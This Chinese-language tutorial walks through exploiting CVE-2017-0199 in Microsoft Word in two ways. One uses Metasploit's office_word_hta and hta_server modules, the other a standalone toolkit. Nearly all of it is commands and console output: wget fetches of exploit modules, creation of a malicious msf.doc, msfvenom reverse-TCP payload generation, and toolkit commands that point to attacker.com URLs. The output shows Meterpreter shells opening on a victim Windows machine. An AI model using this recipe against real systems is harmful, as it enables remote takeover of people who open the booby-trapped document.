0x01 通过Metasploit
参考链接
准备
更新 MSF 到最新。
下载对应 Exploit
cd /usr/share/metasploit-framework/modules/exploits/windows/fileformat
wget https://raw.githubusercontent.com/nixawk/metasploit-framework/feature/CVE-2017-0199/modules/exploits/windows/fileformat/office_word_hta.rb下载 rtf 文件
cd /usr/share/metasploit-framework/data/exploits
wget https://raw.githubusercontent.com/nixawk/metasploit-framework/feature/CVE-2017-0199/data/exploits/cve-2017-0199.rtf开启 HTA 服务
msf > use exploit/windows/misc/hta_server
msf exploit(hta_server) > show options
Module options (exploit/windows/misc/hta_server):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 Powershell x86
msf exploit(hta_server) > run
[*] Exploit running as background job.
[*] Started reverse TCP handler on 10.14.81.6:4444
[*] Using URL: http://0.0.0.0:8080/5Fzi0vL.hta
[*] Local IP: http://10.14.81.6:8080/5Fzi0vL.hta
msf exploit(hta_server) > [*] Server started.
msf exploit(hta_server) > 生成 payload
msf exploit(hta_server) > use exploit/windows/fileformat/office_word_hta
msf exploit(office_word_hta) > show options
Module options (exploit/windows/fileformat/office_word_hta):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME no The file name.
TARGETURI http://example.com/test.rtf yes The path to a online hta file.
Exploit target:
Id Name
-- ----
0 Microsoft Office Word
msf exploit(office_word_hta) > set TARGETURI http://10.14.81.6:8080/5Fzi0vL.hta
TARGETURI => http://10.14.81.6:8080/5Fzi0vL.hta
msf exploit(office_word_hta) > set FILENAME msf.doc
FILENAME => msf.doc
msf exploit(office_word_hta) > run
[+] msf.doc stored at /root/.msf4/local/msf.doc
msf exploit(office_word_hta) > 将生成的 msf.doc 文件复制到 Windows 上,打开即可获取一个会话。
msf exploit(office_word_hta) >
[*] 10.14.89.247 hta_server - Delivering Payload
[*] 10.14.89.247 hta_server - Delivering Payload
[*] Sending stage (957487 bytes) to 10.14.89.247
[*] Meterpreter session 1 opened (10.14.81.6:4444 -> 10.14.89.247:10576) at 2017-04-19 21:58:03 +0800
msf exploit(office_word_hta) > sessions -i
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/windows hp-PC\hp @ HP-PC 10.14.81.6:4444 -> 10.14.89.247:10576 (10.14.89.247)
msf exploit(office_word_hta) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : HP-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 4
Meterpreter : x86/windows0x02 通过 Toolkit
准备
下载 Toolkit。
生成 payload
python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>生成 meterpreter payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"开启 HTA 服务
python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>受害者打开文档后收到 shell。
[*] Started reverse TCP handler on 10.14.81.6:4444
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to 10.14.89.247
[*] Meterpreter session 1 opened (10.14.81.6:4444 -> 10.14.89.247:12775) at 2017-04-19 23:09:03 +0800
meterpreter > sysinfo
Computer : HP-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 4
Meterpreter : x86/windows
meterpreter > screenshot
[-] stdapi_ui_desktop_screenshot: Operation failed: Access is denied.